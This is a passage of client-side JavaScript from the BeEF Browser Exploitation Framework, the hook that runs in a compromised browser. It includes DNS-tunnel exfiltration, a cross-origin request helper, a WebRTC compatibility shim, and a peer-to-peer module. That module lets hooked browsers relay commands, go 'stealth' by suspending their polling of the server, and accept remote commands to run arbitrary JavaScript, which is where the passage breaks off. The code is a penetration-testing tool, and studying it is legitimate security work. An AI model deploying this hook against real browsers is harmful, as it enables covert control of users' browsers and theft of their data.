8316 var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
8317
8318 beef.debug(segments.length);
8319
8320 for (var seq=1; seq<=segments.length; seq++) {
8321 sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
8322 }
8323
8324 // callback - returns the number of queries sent
8325 if (!!callback) callback(segments.length);
8326
8327 }
8328
8329};
8330
8331beef.regCmp('beef.net.dns');
8332
8333
8334
8335//
8336// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
8337// Browser Exploitation Framework (BeEF) - http://beefproject.com
8338// See the file 'doc/COPYING' for copying permission
8339//
8340
8341// beef.net.connection - wraps Mozilla's Network Information API
8342// https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
8343// https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection
8344beef.net.connection = {
8345
8346 /* Returns the connection type
8347 * @example: beef.net.connection.type()
8348 * @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type
8349 * @return: {String} connection type or 'unknown'.
8350 **/
8351 type: function () {
8352 try {
8353 var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
8354 var type = connection.type;
8355 if (/^[a-z]+$/.test(type)) return type; else return 'unknown';
8356 } catch(e) {
8357 beef.debug("Error retrieving connection type: " + e.message);
8358 return 'unknown';
8359 }
8360 },
8361
8362 /* Returns the maximum downlink speed of the connection
8363 * @example: beef.net.connection.downlinkMax()
8364 * @note: https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax
8365 * @return: {String} downlink max or 'unknown'.
8366 **/
8367 downlinkMax: function () {
8368 try {
8369 var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
8370 var max = connection.downlinkMax;
8371 if (max) return max; else return 'unknown';
8372 } catch(e) {
8373 beef.debug("Error retrieving connection downlink max: " + e.message);
8374 return 'unknown';
8375 }
8376 }
8377
8378};
8379
8380beef.regCmp('beef.net.connection');
8381
8382
8383
8384beef.net.cors = {
8385
8386 handler: "cors",
8387
8388 /**
8389 * Response Object - used in the beef.net.request callback
8390 */
8391 response:function () {
8392 this.status = null; // 500, 404, 200, 302, etc
8393 this.headers = null; // full response headers
8394 this.body = null; // full response body
8395 },
8396
8397 /**
8398 * Make a cross-origin request using CORS
8399 *
8400 * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
8401 * @param url {String} url
8402 * @param data {String} request body
8403 * @param callback {Function} function to callback on completion
8404 */
8405 request: function(method, url, data, callback) {
8406
8407 var xhr;
8408 var response = new this.response;
8409
8410 if (XMLHttpRequest) {
8411 xhr = new XMLHttpRequest();
8412
8413 if ('withCredentials' in xhr) {
8414 xhr.open(method, url, true);
8415 xhr.onerror = function() {
8416 };
8417 xhr.onreadystatechange = function() {
8418 if (xhr.readyState === 4) {
8419 response.headers = this.getAllResponseHeaders()
8420 response.body = this.responseText;
8421 response.status = this.status;
8422 if (!!callback) {
8423 if (!!response) {
8424 callback(response);
8425 } else {
8426 callback('ERROR: No Response. CORS requests may be denied for this resource.')
8427 }
8428 }
8429 }
8430 };
8431 xhr.send(data);
8432 }
8433 } else if (typeof XDomainRequest != "undefined") {
8434 xhr = new XDomainRequest();
8435 xhr.open(method, url);
8436 xhr.onerror = function() {
8437 };
8438 xhr.onload = function() {
8439 response.headers = this.getAllResponseHeaders()
8440 response.body = this.responseText;
8441 response.status = this.status;
8442 if (!!callback) {
8443 if (!!response) {
8444 callback(response);
8445 } else {
8446 callback('ERROR: No Response. CORS requests may be denied for this resource.')
8447 }
8448 }
8449 };
8450 xhr.send(data);
8451 } else {
8452 if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
8453 }
8454
8455 }
8456
8457};
8458
8459beef.regCmp('beef.net.cors');
8460
8461
8462
8463//
8464// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
8465// Browser Exploitation Framework (BeEF) - http://beefproject.com
8466// See the file 'doc/COPYING' for copying permission
8467//
8468
8469beef.are = {
8470 status_success: function(){
8471 return 1;
8472 },
8473 status_unknown: function(){
8474 return 0;
8475 },
8476 status_error: function(){
8477 return -1;
8478 }
8479};
8480beef.regCmp("beef.are");
8481
8482
8483/*
8484 * Copyright (c) 2014 The WebRTC project authors. All Rights Reserved.
8485 *
8486 * Use of this source code is governed by a BSD-style license
8487 * that can be found in the LICENSE file in the root of the source
8488 * tree.
8489 */
8490
8491/* More information about these options at jshint.com/docs/options */
8492/* jshint browser: true, camelcase: true, curly: true, devel: true,
8493 eqeqeq: true, forin: false, globalstrict: true, node: true,
8494 quotmark: single, undef: true, unused: strict */
8495/* global mozRTCIceCandidate, mozRTCPeerConnection, Promise,
8496mozRTCSessionDescription, webkitRTCPeerConnection, MediaStreamTrack */
8497/* exported trace,requestUserMedia */
8498
8499'use strict';
8500
8501var getUserMedia = null;
8502var attachMediaStream = null;
8503var reattachMediaStream = null;
8504var webrtcDetectedBrowser = null;
8505var webrtcDetectedVersion = null;
8506var webrtcMinimumVersion = null;
8507
8508function trace(text) {
8509 // This function is used for logging.
8510 if (text[text.length - 1] === '\n') {
8511 text = text.substring(0, text.length - 1);
8512 }
8513 if (window.performance) {
8514 var now = (window.performance.now() / 1000).toFixed(3);
8515 beef.debug(now + ': ' + text);
8516 } else {
8517 beef.debug(text);
8518 }
8519}
8520
8521if (navigator.mozGetUserMedia) {
8522
8523 webrtcDetectedBrowser = 'firefox';
8524
8525 // the detected firefox version.
8526 webrtcDetectedVersion =
8527 parseInt(navigator.userAgent.match(/Firefox\/([0-9]+)\./)[1], 10);
8528
8529 // the minimum firefox version still supported by adapter.
8530 webrtcMinimumVersion = 31;
8531
8532 // The RTCPeerConnection object.
8533 window.RTCPeerConnection = function(pcConfig, pcConstraints) {
8534 if (webrtcDetectedVersion < 38) {
8535 // .urls is not supported in FF < 38.
8536 // create RTCIceServers with a single url.
8537 if (pcConfig && pcConfig.iceServers) {
8538 var newIceServers = [];
8539 for (var i = 0; i < pcConfig.iceServers.length; i++) {
8540 var server = pcConfig.iceServers[i];
8541 if (server.hasOwnProperty('urls')) {
8542 for (var j = 0; j < server.urls.length; j++) {
8543 var newServer = {
8544 url: server.urls[j]
8545 };
8546 if (server.urls[j].indexOf('turn') === 0) {
8547 newServer.username = server.username;
8548 newServer.credential = server.credential;
8549 }
8550 newIceServers.push(newServer);
8551 }
8552 } else {
8553 newIceServers.push(pcConfig.iceServers[i]);
8554 }
8555 }
8556 pcConfig.iceServers = newIceServers;
8557 }
8558 }
8559 return new mozRTCPeerConnection(pcConfig, pcConstraints);
8560 };
8561
8562 // The RTCSessionDescription object.
8563 window.RTCSessionDescription = mozRTCSessionDescription;
8564
8565 // The RTCIceCandidate object.
8566 window.RTCIceCandidate = mozRTCIceCandidate;
8567
8568 // getUserMedia constraints shim.
8569 getUserMedia = (webrtcDetectedVersion < 38) ?
8570 function(c, onSuccess, onError) {
8571 var constraintsToFF37 = function(c) {
8572 if (typeof c !== 'object' || c.require) {
8573 return c;
8574 }
8575 var require = [];
8576 Object.keys(c).forEach(function(key) {
8577 var r = c[key] = (typeof c[key] === 'object') ?
8578 c[key] : {ideal: c[key]};
8579 if (r.exact !== undefined) {
8580 r.min = r.max = r.exact;
8581 delete r.exact;
8582 }
8583 if (r.min !== undefined || r.max !== undefined) {
8584 require.push(key);
8585 }
8586 if (r.ideal !== undefined) {
8587 c.advanced = c.advanced || [];
8588 var oc = {};
8589 oc[key] = {min: r.ideal, max: r.ideal};
8590 c.advanced.push(oc);
8591 delete r.ideal;
8592 if (!Object.keys(r).length) {
8593 delete c[key];
8594 }
8595 }
8596 });
8597 if (require.length) {
8598 c.require = require;
8599 }
8600 return c;
8601 };
8602 beef.debug('spec: ' + JSON.stringify(c));
8603 c.audio = constraintsToFF37(c.audio);
8604 c.video = constraintsToFF37(c.video);
8605 beef.debug('ff37: ' + JSON.stringify(c));
8606 return navigator.mozGetUserMedia(c, onSuccess, onError);
8607 } : navigator.mozGetUserMedia.bind(navigator);
8608
8609 navigator.getUserMedia = getUserMedia;
8610
8611 // Shim for mediaDevices on older versions.
8612 if (!navigator.mediaDevices) {
8613 navigator.mediaDevices = {getUserMedia: requestUserMedia,
8614 addEventListener: function() { },
8615 removeEventListener: function() { }
8616 };
8617 }
8618 navigator.mediaDevices.enumerateDevices =
8619 navigator.mediaDevices.enumerateDevices || function() {
8620 return new Promise(function(resolve) {
8621 var infos = [
8622 {kind: 'audioinput', deviceId: 'default', label:'', groupId:''},
8623 {kind: 'videoinput', deviceId: 'default', label:'', groupId:''}
8624 ];
8625 resolve(infos);
8626 });
8627 };
8628
8629 if (webrtcDetectedVersion < 41) {
8630 // Work around http://bugzil.la/1169665
8631 var orgEnumerateDevices =
8632 navigator.mediaDevices.enumerateDevices.bind(navigator.mediaDevices);
8633 navigator.mediaDevices.enumerateDevices = function() {
8634 return orgEnumerateDevices().catch(function(e) {
8635 if (e.name === 'NotFoundError') {
8636 return [];
8637 }
8638 throw e;
8639 });
8640 };
8641 }
8642 // Attach a media stream to an element.
8643 attachMediaStream = function(element, stream) {
8644 beef.debug('Attaching media stream');
8645 element.mozSrcObject = stream;
8646 };
8647
8648 reattachMediaStream = function(to, from) {
8649 beef.debug('Reattaching media stream');
8650 to.mozSrcObject = from.mozSrcObject;
8651 };
8652
8653} else if (navigator.webkitGetUserMedia) {
8654
8655 webrtcDetectedBrowser = 'chrome';
8656
8657 // the detected chrome version.
8658 webrtcDetectedVersion =
8659 parseInt(navigator.userAgent.match(/Chrom(e|ium)\/([0-9]+)\./)[2], 10);
8660
8661 // the minimum chrome version still supported by adapter.
8662 webrtcMinimumVersion = 38;
8663
8664 // The RTCPeerConnection object.
8665 window.RTCPeerConnection = function(pcConfig, pcConstraints) {
8666 var pc = new webkitRTCPeerConnection(pcConfig, pcConstraints);
8667 var origGetStats = pc.getStats.bind(pc);
8668 pc.getStats = function(selector, successCallback, errorCallback) { // jshint ignore: line
8669 // If selector is a function then we are in the old style stats so just
8670 // pass back the original getStats format to avoid breaking old users.
8671 if (typeof selector === 'function') {
8672 return origGetStats(selector, successCallback);
8673 }
8674
8675 var fixChromeStats = function(response) {
8676 var standardReport = {};
8677 var reports = response.result();
8678 reports.forEach(function(report) {
8679 var standardStats = {
8680 id: report.id,
8681 timestamp: report.timestamp,
8682 type: report.type
8683 };
8684 report.names().forEach(function(name) {
8685 standardStats[name] = report.stat(name);
8686 });
8687 standardReport[standardStats.id] = standardStats;
8688 });
8689
8690 return standardReport;
8691 };
8692 var successCallbackWrapper = function(response) {
8693 successCallback(fixChromeStats(response));
8694 };
8695 return origGetStats(successCallbackWrapper, selector);
8696 };
8697
8698 return pc;
8699 };
8700
8701 // add promise support
8702 ['createOffer', 'createAnswer'].forEach(function(method) {
8703 var nativeMethod = webkitRTCPeerConnection.prototype[method];
8704 webkitRTCPeerConnection.prototype[method] = function() {
8705 var self = this;
8706 if (arguments.length < 1 || (arguments.length === 1 &&
8707 typeof(arguments[0]) === 'object')) {
8708 var opts = arguments.length === 1 ? arguments[0] : undefined;
8709 return new Promise(function(resolve, reject) {
8710 nativeMethod.apply(self, [resolve, reject, opts]);
8711 });
8712 } else {
8713 return nativeMethod.apply(this, arguments);
8714 }
8715 };
8716 });
8717
8718 ['setLocalDescription', 'setRemoteDescription',
8719 'addIceCandidate'].forEach(function(method) {
8720 var nativeMethod = webkitRTCPeerConnection.prototype[method];
8721 webkitRTCPeerConnection.prototype[method] = function() {
8722 var args = arguments;
8723 var self = this;
8724 return new Promise(function(resolve, reject) {
8725 nativeMethod.apply(self, [args[0],
8726 function() {
8727 resolve();
8728 if (args.length >= 2) {
8729 args[1].apply(null, []);
8730 }
8731 },
8732 function(err) {
8733 reject(err);
8734 if (args.length >= 3) {
8735 args[2].apply(null, [err]);
8736 }
8737 }]
8738 );
8739 });
8740 };
8741 });
8742
8743 // getUserMedia constraints shim.
8744 getUserMedia = function(c, onSuccess, onError) {
8745 var constraintsToChrome = function(c) {
8746 if (typeof c !== 'object' || c.mandatory || c.optional) {
8747 return c;
8748 }
8749 var cc = {};
8750 Object.keys(c).forEach(function(key) {
8751 if (key === 'require' || key === 'advanced') {
8752 return;
8753 }
8754 var r = (typeof c[key] === 'object') ? c[key] : {ideal: c[key]};
8755 if (r.exact !== undefined && typeof r.exact === 'number') {
8756 r.min = r.max = r.exact;
8757 }
8758 var oldname = function(prefix, name) {
8759 if (prefix) {
8760 return prefix + name.charAt(0).toUpperCase() + name.slice(1);
8761 }
8762 return (name === 'deviceId') ? 'sourceId' : name;
8763 };
8764 if (r.ideal !== undefined) {
8765 cc.optional = cc.optional || [];
8766 var oc = {};
8767 if (typeof r.ideal === 'number') {
8768 oc[oldname('min', key)] = r.ideal;
8769 cc.optional.push(oc);
8770 oc = {};
8771 oc[oldname('max', key)] = r.ideal;
8772 cc.optional.push(oc);
8773 } else {
8774 oc[oldname('', key)] = r.ideal;
8775 cc.optional.push(oc);
8776 }
8777 }
8778 if (r.exact !== undefined && typeof r.exact !== 'number') {
8779 cc.mandatory = cc.mandatory || {};
8780 cc.mandatory[oldname('', key)] = r.exact;
8781 } else {
8782 ['min', 'max'].forEach(function(mix) {
8783 if (r[mix] !== undefined) {
8784 cc.mandatory = cc.mandatory || {};
8785 cc.mandatory[oldname(mix, key)] = r[mix];
8786 }
8787 });
8788 }
8789 });
8790 if (c.advanced) {
8791 cc.optional = (cc.optional || []).concat(c.advanced);
8792 }
8793 return cc;
8794 };
8795 beef.debug('spec: ' + JSON.stringify(c)); // whitespace for alignment
8796 c.audio = constraintsToChrome(c.audio);
8797 c.video = constraintsToChrome(c.video);
8798 beef.debug('chrome: ' + JSON.stringify(c));
8799 return navigator.webkitGetUserMedia(c, onSuccess, onError);
8800 };
8801 navigator.getUserMedia = getUserMedia;
8802
8803 // Attach a media stream to an element.
8804 attachMediaStream = function(element, stream) {
8805 if (typeof element.srcObject !== 'undefined') {
8806 element.srcObject = stream;
8807 } else if (typeof element.src !== 'undefined') {
8808 element.src = URL.createObjectURL(stream);
8809 } else {
8810 beef.debug('Error attaching stream to element.');
8811 }
8812 };
8813
8814 reattachMediaStream = function(to, from) {
8815 to.src = from.src;
8816 };
8817
8818 if (!navigator.mediaDevices) {
8819 navigator.mediaDevices = {getUserMedia: requestUserMedia,
8820 enumerateDevices: function() {
8821 return new Promise(function(resolve) {
8822 var kinds = {audio: 'audioinput', video: 'videoinput'};
8823 return MediaStreamTrack.getSources(function(devices) {
8824 resolve(devices.map(function(device) {
8825 return {label: device.label,
8826 kind: kinds[device.kind],
8827 deviceId: device.id,
8828 groupId: ''};
8829 }));
8830 });
8831 });
8832 }};
8833 // in case someone wants to listen for the devicechange event.
8834 navigator.mediaDevices.addEventListener = function() { };
8835 navigator.mediaDevices.removeEventListener = function() { };
8836 }
8837} else if (navigator.mediaDevices && navigator.userAgent.match(
8838 /Edge\/(\d+).(\d+)$/)) {
8839 webrtcDetectedBrowser = 'edge';
8840
8841 webrtcDetectedVersion =
8842 parseInt(navigator.userAgent.match(/Edge\/(\d+).(\d+)$/)[2], 10);
8843
8844 // the minimum version still supported by adapter.
8845 webrtcMinimumVersion = 12;
8846
8847 attachMediaStream = function(element, stream) {
8848 element.srcObject = stream;
8849 };
8850 reattachMediaStream = function(to, from) {
8851 to.srcObject = from.srcObject;
8852 };
8853} else {
8854 // console.log('Browser does not appear to be WebRTC-capable');
8855}
8856
8857// Returns the result of getUserMedia as a Promise.
8858function requestUserMedia(constraints) {
8859 return new Promise(function(resolve, reject) {
8860 getUserMedia(constraints, resolve, reject);
8861 });
8862}
8863
8864if (typeof module !== 'undefined') {
8865 module.exports = {
8866 RTCPeerConnection: window.RTCPeerConnection,
8867 getUserMedia: getUserMedia,
8868 attachMediaStream: attachMediaStream,
8869 reattachMediaStream: reattachMediaStream,
8870 webrtcDetectedBrowser: webrtcDetectedBrowser,
8871 webrtcDetectedVersion: webrtcDetectedVersion,
8872 webrtcMinimumVersion: webrtcMinimumVersion
8873 //requestUserMedia: not exposed on purpose.
8874 //trace: not exposed on purpose.
8875 };
8876} else if ((typeof require === 'function') && (typeof define === 'function')) {
8877 // Expose objects and functions when RequireJS is doing the loading.
8878 define([], function() {
8879 return {
8880 RTCPeerConnection: window.RTCPeerConnection,
8881 getUserMedia: getUserMedia,
8882 attachMediaStream: attachMediaStream,
8883 reattachMediaStream: reattachMediaStream,
8884 webrtcDetectedBrowser: webrtcDetectedBrowser,
8885 webrtcDetectedVersion: webrtcDetectedVersion,
8886 webrtcMinimumVersion: webrtcMinimumVersion
8887 //requestUserMedia: not exposed on purpose.
8888 //trace: not exposed on purpose.
8889 };
8890 });
8891}
8892
8893
8894//
8895// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
8896// Browser Exploitation Framework (BeEF) - http://beefproject.com
8897// See the file 'doc/COPYING' for copying permission
8898//
8899
8900
8901/**
8902 * @Literal object: beef.webrtc
8903 *
8904 * Manage the WebRTC peer to peer communication channels.
8905 * This objects contains all the necessary client-side WebRTC components,
8906 * allowing browsers to use WebRTC to communicate with each other.
8907 * To provide signaling, the WebRTC extension sets up custom listeners.
8908 * /rtcsignal - for sending RTC signalling information between peers
8909 * /rtcmessage - for client-side rtc messages to be submitted back into beef and logged.
8910 *
8911 * To ensure signaling gets back to the peers, the hook.js dynamic construction also includes
8912 * the signalling.
8913 *
8914 * This is all mostly a Proof of Concept
8915 */
8916
8917beefrtcs = {}; // To handle multiple peers - we need to have a hash of Beefwebrtc objects
8918 // The key is the peer id
8919globalrtc = {}; // To handle multiple Peers - we have to have a global hash of RTCPeerConnection objects
8920 // these objects persist outside of everything else
8921 // The key is the peer id
8922rtcstealth = false; // stealth should only be initiated from one peer - this global variable will contain:
8923 // false - i.e not stealthed; or
8924 // <peerid> - i.e. the id of the browser which initiated stealth mode
8925rtcrecvchan = {}; // To handle multiple event channels - we need to have a global hash of these
8926 // The key is the peer id
8927
8928// Beefwebrtc object - wraps everything together for a peer connection
8929// One of these per peer connection, and will be stored in the beefrtc global hash
8930function Beefwebrtc(initiator,peer,turnjson,stunservers,verbparam) {
8931 this.verbose = typeof verbparam !== 'undefined' ? verbparam : false; // whether this object is verbose or not
8932 this.initiator = typeof initiator !== 'undefined' ? initiator : 0; // if 1 - this is the caller; if 0 - this is the receiver
8933 this.peerid = typeof peer !== 'undefined' ? peer : null; // id of this rtc peer
8934 this.turnjson = turnjson; // set of TURN servers in the format:
8935 // {"username": "<username", "password": "<password>", "uris": [
8936 // "turn:<ip>:<port>?transport=<udp/tcp>",
8937 // "turn:<ip>:<port>?transport=<udp/tcp>"]}
8938 this.started = false; // Has signaling / dialing started for this peer
8939 this.gotanswer = false; // For the caller - this determines whether they have received an SDP answer from the receiver
8940 this.turnDone = false; // does the pcConfig have TURN servers added to it?
8941 this.signalingReady = false; // the initiator (Caller) is always ready to signal. So this sets to true during init
8942 // the receiver will set this to true once it receives an SDP 'offer'
8943 this.msgQueue = []; // because the handling of SDP signals may happen in any order - we need a queue for them
8944 this.pcConfig = null; // We set this during init
8945 this.pcConstraints = {"optional": [{"googImprovedWifiBwe": true}]} // PeerConnection constraints
8946 this.offerConstraints = {"optional": [], "mandatory": {}}; // Default SDP Offer Constraints - used in the caller
8947 this.sdpConstraints = {'optional': [{'RtpDataChannels':true}]}; // Default SDP Constraints - used by caller and receiver
8948 this.gatheredIceCandidateTypes = { Local: {}, Remote: {} }; // ICE Candidates
8949 this.allgood = false; // Is this object / peer connection with the nominated peer ready to go?
8950 this.dataChannel = null; // The data channel used by this peer
8951 this.stunservers = stunservers; // set of STUN servers, in the format:
8952 // ["stun:stun.l.google.com:19302","stun:stun1.l.google.com:19302"]
8953}
8954
8955// Initialize the object
8956Beefwebrtc.prototype.initialize = function() {
8957 if (this.peerid == null) {
8958 return 0; // no peerid - NO DICE
8959 }
8960
8961 // Initialise the pcConfig hash with the provided stunservers
8962 var stuns = JSON.parse(this.stunservers);
8963 this.pcConfig = {"iceServers": [{"urls":stuns, "username":"user",
8964 "credential":"pass"}]};
8965
8966 // We're not getting the browsers to request their own TURN servers, we're specifying them through BeEF
8967 // this.forceTurn(this.turnjson);
8968 this.turnDone = true;
8969
8970 // Caller is always ready to create peerConnection.
8971 this.signalingReady = this.initiator;
8972
8973 // Start .. maybe
8974 this.maybeStart();
8975
8976 // If the window is closed, send a signal to beef .. this is not all that great, so just commenting out
8977 // window.onbeforeunload = function() {
8978 // this.sendSignalMsg({type: 'bye'});
8979 // }
8980
8981 return 1; // because .. yeah .. we had a peerid - this is good yar.
8982}
8983
8984//Forces the TURN configuration (we can't query that computeengine thing because it's CORS is restrictive)
8985//These values are now simply passed in from the config.yaml for the webrtc extension
8986Beefwebrtc.prototype.forceTurn = function(jason) {
8987 var turnServer = JSON.parse(jason);
8988 var iceServers = createIceServers(turnServer.uris,
8989 turnServer.username,
8990 turnServer.password);
8991 if (iceServers !== null) {
8992 this.pcConfig.iceServers = this.pcConfig.iceServers.concat(iceServers);
8993 }
8994 beef.debug("Got TURN servers, will try and maybestart again..");
8995 this.turnDone = true;
8996 this.maybeStart();
8997}
8998
8999// Try and establish the RTC connection
9000Beefwebrtc.prototype.createPeerConnection = function() {
9001 beef.debug('Creating RTCPeerConnnection with the following options:\n' +
9002 ' config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
9003 ' constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
9004 try {
9005 // Create an RTCPeerConnection via the polyfill (webrtcadapter.js).
9006 globalrtc[this.peerid] = new RTCPeerConnection(this.pcConfig, this.pcConstraints);
9007 globalrtc[this.peerid].onicecandidate = this.onIceCandidate;
9008 beef.debug('Created RTCPeerConnnection with the following options:\n' +
9009 ' config: \'' + JSON.stringify(this.pcConfig) + '\';\n' +
9010 ' constraints: \'' + JSON.stringify(this.pcConstraints) + '\'.');
9011
9012 } catch (e) {
9013 beef.debug('Failed to create PeerConnection, exception: ');
9014 beef.debug(e);
9015 return;
9016 }
9017
9018 // Assign event handlers to signalstatechange, iceconnectionstatechange, datachannel etc
9019 globalrtc[this.peerid].onsignalingstatechange = this.onSignalingStateChanged;
9020 globalrtc[this.peerid].oniceconnectionstatechange = this.onIceConnectionStateChanged;
9021 globalrtc[this.peerid].ondatachannel = this.onDataChannel;
9022 this.dataChannel = globalrtc[this.peerid].createDataChannel("sendDataChannel", {reliable:false});
9023}
9024
9025// When the PeerConnection receives a new ICE Candidate
9026Beefwebrtc.prototype.onIceCandidate = function(event) {
9027 var peerid = null;
9028
9029 for (var k in beefrtcs) {
9030 if (beefrtcs[k].allgood === false) {
9031 peerid = beefrtcs[k].peerid;
9032 }
9033 }
9034
9035 beef.debug("Handling onicecandidate event while connecting to peer: " + peerid + ". Event received:");
9036 beef.debug(event);
9037
9038 if (event.candidate) {
9039 // Send the candidate to the peer via the BeEF signalling channel
9040 beefrtcs[peerid].sendSignalMsg({type: 'candidate',
9041 label: event.candidate.sdpMLineIndex,
9042 id: event.candidate.sdpMid,
9043 candidate: event.candidate.candidate});
9044 // Note this ICE candidate locally
9045 beefrtcs[peerid].noteIceCandidate("Local", beefrtcs[peerid].iceCandidateType(event.candidate.candidate));
9046 } else {
9047 beef.debug('End of candidates.');
9048 }
9049}
9050
9051// For all rtc signalling messages we receive as part of hook.js polling - we have to process them with this function
9052// This will either add messages to the msgQueue and try and kick off maybeStart - or it'll call processSignalingMessage
9053// against the message directly
9054Beefwebrtc.prototype.processMessage = function(message) {
9055 beef.debug('Signalling Message - S->C: ' + JSON.stringify(message));
9056 var msg = JSON.parse(message);
9057
9058 if (!this.initiator && !this.started) { // We are currently the receiver AND we have NOT YET received an SDP Offer
9059 beef.debug('processing the message, as a receiver');
9060 if (msg.type === 'offer') { // This IS an SDP Offer
9061 beef.debug('.. and the message is an offer .. ');
9062 this.msgQueue.unshift(msg); // put it on the top of the msgqueue
9063 this.signalingReady = true; // As the receiver, we've now got an SDP Offer, so lets set signalingReady to true
9064 this.maybeStart(); // Lets try and start again - this will end up with calleeStart() getting executed
9065 } else { // This is NOT an SDP Offer - as the receiver, just add it to the queue
9066 beef.debug(' .. the message is NOT an offer .. ');
9067 this.msgQueue.push(msg);
9068 }
9069 } else if (this.initiator && !this.gotanswer) { // We are currently the caller AND we have NOT YET received the SDP Answer
9070 beef.debug('processing the message, as the sender, no answers yet');
9071 if (msg.type === 'answer') { // This IS an SDP Answer
9072 beef.debug('.. and we have an answer ..');
9073 this.processSignalingMessage(msg); // Process the message directly
9074 this.gotanswer = true; // We have now received an answer
9075 //process all other queued message...
9076 while (this.msgQueue.length > 0) {
9077 this.processSignalingMessage(this.msgQueue.shift());
9078 }
9079 } else { // This is NOT an SDP Answer - as the caller, just add it to the queue
9080 beef.debug('.. not an answer ..');
9081 this.msgQueue.push(msg);
9082 }
9083 } else { // For all other messages just drop them in the queue
9084 beef.debug('processing a message, but, not as a receiver, OR, the rtc is already up');
9085 this.processSignalingMessage(msg);
9086 }
9087}
9088
9089// Send a signalling message ..
9090Beefwebrtc.prototype.sendSignalMsg = function(message) {
9091 var msgString = JSON.stringify(message);
9092 beef.debug('Signalling Message - C->S: ' + msgString);
9093 beef.net.send('/rtcsignal',0,{targetbeefid: this.peerid, signal: msgString});
9094}
9095
9096// Used to record ICS candidates locally
9097Beefwebrtc.prototype.noteIceCandidate = function(location, type) {
9098 if (this.gatheredIceCandidateTypes[location][type])
9099 return;
9100 this.gatheredIceCandidateTypes[location][type] = 1;
9101 // updateInfoDiv();
9102}
9103
9104// When the signalling state changes. We don't actually do anything with this except log it.
9105Beefwebrtc.prototype.onSignalingStateChanged = function(event) {
9106 beef.debug("Signalling has changed to: " + event.target.signalingState);
9107}
9108
9109// When the ICE Connection State changes - this is useful to determine connection statuses with peers.
9110Beefwebrtc.prototype.onIceConnectionStateChanged = function(event) {
9111 var peerid = null;
9112
9113 for (k in globalrtc) {
9114 if ((globalrtc[k].localDescription.sdp === event.target.localDescription.sdp) && (globalrtc[k].localDescription.type === event.target.localDescription.type)) {
9115 peerid = k;
9116 }
9117 }
9118
9119 beef.debug("ICE with peer: " + peerid + " has changed to: " + event.target.iceConnectionState);
9120
9121 // ICE Connection Status has connected - this is good. Normally means the RTCPeerConnection is ready! Although may still look for
9122 // better candidates or connections
9123 if (event.target.iceConnectionState === 'connected') {
9124 //Send status to peer
9125 window.setTimeout(function() {
9126 beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
9127 beefrtcs[peerid].allgood = true;
9128 },1000);
9129 }
9130
9131 // Completed is similar to connected. Except, each of the ICE components are good, and no more testing remote candidates is done.
9132 if (event.target.iceConnectionState === 'completed') {
9133 window.setTimeout(function() {
9134 beefrtcs[peerid].sendPeerMsg('ICE Status: '+event.target.iceConnectionState);
9135 beefrtcs[peerid].allgood = true;
9136 },1000);
9137 }
9138
9139 if ((rtcstealth == peerid) && (event.target.iceConnectionState === 'disconnected')) {
9140 //I was in stealth mode, talking back to this peer - but it's gone offline.. come out of stealth
9141 rtcstealth = false;
9142 beefrtcs[peerid].allgood = false;
9143 beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
9144 } else if ((rtcstealth == false) && (event.target.iceConnectionState === 'disconnected')) {
9145 //I was not in stealth, and this peer has gone offline - send a message
9146 beefrtcs[peerid].allgood = false;
9147 beef.net.send('/rtcmessage',0,{peerid: peerid, message: peerid + " - has apparently gotten disconnected"});
9148 }
9149 // We don't handle situations where a stealthed peer loses a peer that is NOT the peer that made it go into stealth
9150 // This is possibly a bad idea - @xntrik
9151
9152
9153}
9154
9155// This is the function when a peer tells us to go into stealth by sending a dataChannel message of "!gostealth"
9156Beefwebrtc.prototype.goStealth = function() {
9157 //stop the beef updater
9158 rtcstealth = this.peerid; // this is a global variable
9159 beef.updater.lock = true;
9160 this.sendPeerMsg('Going into stealth mode');
9161
9162 setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 5);
9163}
9164
9165// This is the actual poller when in stealth, it is global as well because we're using the setTimeout to execute it
9166rtcpollPeer = function() {
9167 if (rtcstealth == false) {
9168 //my peer has disabled stealth mode
9169 beef.updater.lock = false;
9170 return;
9171 }
9172
9173 beef.debug('lub dub');
9174
9175 beefrtcs[rtcstealth].sendPeerMsg('Stayin alive'); // This is the heartbeat we send back to the peer that made us stealth
9176
9177 setTimeout(function() {rtcpollPeer()}, beef.updater.xhr_poll_timeout * 5);
9178}
9179
9180// When a data channel has been established - within here is the message handling function as well
9181Beefwebrtc.prototype.onDataChannel = function(event) {
9182 var peerid = null;
9183 for (k in globalrtc) {
9184 if ((globalrtc[k].localDescription.sdp === event.currentTarget.localDescription.sdp) && (globalrtc[k].localDescription.type === event.currentTarget.localDescription.type)) {
9185 peerid = k;
9186 }
9187 }
9188
9189 beef.debug("Peer: " + peerid + " has just handled the onDataChannel event");
9190 rtcrecvchan[peerid] = event.channel;
9191
9192 // This is the onmessage event handling within the datachannel
9193 rtcrecvchan[peerid].onmessage = function(ev2) {
9194 beef.debug("Received an RTC message from my peer["+peerid+"]: " + ev2.data);
9195
9196 // We've received the command to go into stealth mode
9197 if (ev2.data == "!gostealth") {
9198 if (beef.updater.lock == true) {
9199 setTimeout(function() {beefrtcs[peerid].goStealth()},beef.updater.xhr_poll_timeout * 0.4);
9200 } else {
9201 beefrtcs[peerid].goStealth();
9202 }
9203
9204 // The message to come out of stealth
9205 } else if (ev2.data == "!endstealth") {
9206
9207 if (rtcstealth != null) {
9208 beefrtcs[rtcstealth].sendPeerMsg("Coming out of stealth...");
9209 rtcstealth = false;
9210 }
9211
9212 // Command to perform arbitrary JS (while stealthed)
